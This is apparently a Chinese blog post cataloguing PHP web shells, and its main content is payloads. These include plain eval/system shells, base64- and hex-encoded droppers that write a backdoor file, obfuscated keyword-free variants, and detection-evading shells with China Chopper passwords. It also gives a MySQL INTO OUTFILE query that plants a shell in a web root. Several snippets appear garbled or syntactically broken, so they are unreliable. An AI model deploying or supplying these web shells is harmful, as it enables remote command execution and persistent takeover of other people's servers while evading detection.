基础类

很容易被扫描、检测出来

<?php @eval($_GET['phpcode']);?>

<?php @eval($_POST['phpcode']);?>

<?php @system($_GET['cmd']);?>

<?php @system($_POST['cmd']);?>

<?php @exec($_POST['cmd']);?>

<?php @passthru($_POST['cmd']);?>

<?php @shell_exec($_POST['cmd']);?>

<?php $cmd=$_POST['cmd']);`$cmd`;?>

@ + function表示忽略警告。

eval() 是可以执行php代码

system() 是可以执行系统命令

编码替换

<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

//会生成<?php @eval($_POST['lostwolf']);?>

<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>

//php在html内部的一种嵌入方式

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

无关键字函数类型

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

躲避检测记录

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST["c"]);?>     //菜刀连接 躲避检测 密码c

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['c']);?>

//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 c

MySQL写入一句话

select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

最新文章

  1. css随笔1
  2. JAVA修饰符
  3. mybatis动态SQL - like
  4. 【转】 Build a RESTful Web service using Jersey and Apache Tomcat 2009
  5. Fortran编译多个文件(转载)
  6. SGU 107
  7. [Linux]学习笔记(1)
  8. php mysql PDO使用
  9. java数据安全(一)
  10. &lt;转载&gt;C++命名空间
  11. 搜索:POJ2251&amp;POJ1426&amp;POJ3087&amp;POJ2488
  12. iOS开发——绘图电池按百分比显示
  13. puppet的配置清单书写
  14. SQL中sysname数据类型的含义(转)
  15. Synchronized总结
  16. C#进阶のMEF注入
  17. 20155324 2016-2017-2 《Java程序设计》第4周学习总结
  18. ela的UNASSIGNED索引修复
  19. load 过高分析办法
  20. Linux 性能分析工具汇总合集

热门文章

  1. LightOJ - 1151 Snakes and Ladders(概率dp+高斯消元)
  2. Educational Codeforces Round 97 (Rated for Div. 2)【ABCD】
  3. Codeforces Round #659 (Div. 2) A. Common Prefixes
  4. 「LYOI2018 Summer」Hzy&#39;s Rabbit Candy----拓扑排序问题
  5. 【noi 2.6_7624】山区建小学(DP)
  6. Educational Codeforces Round 91 (Rated for Div. 2) A. Three Indices (模拟)
  7. 史上最全Redis面试题(含答案):哨兵+复制+事务+集群+持久化等
  8. markdown 公式编写及不同平台公式转换
  9. codeforces 9D(非原创)
  10. 使用Benchmark.NET测试代码性能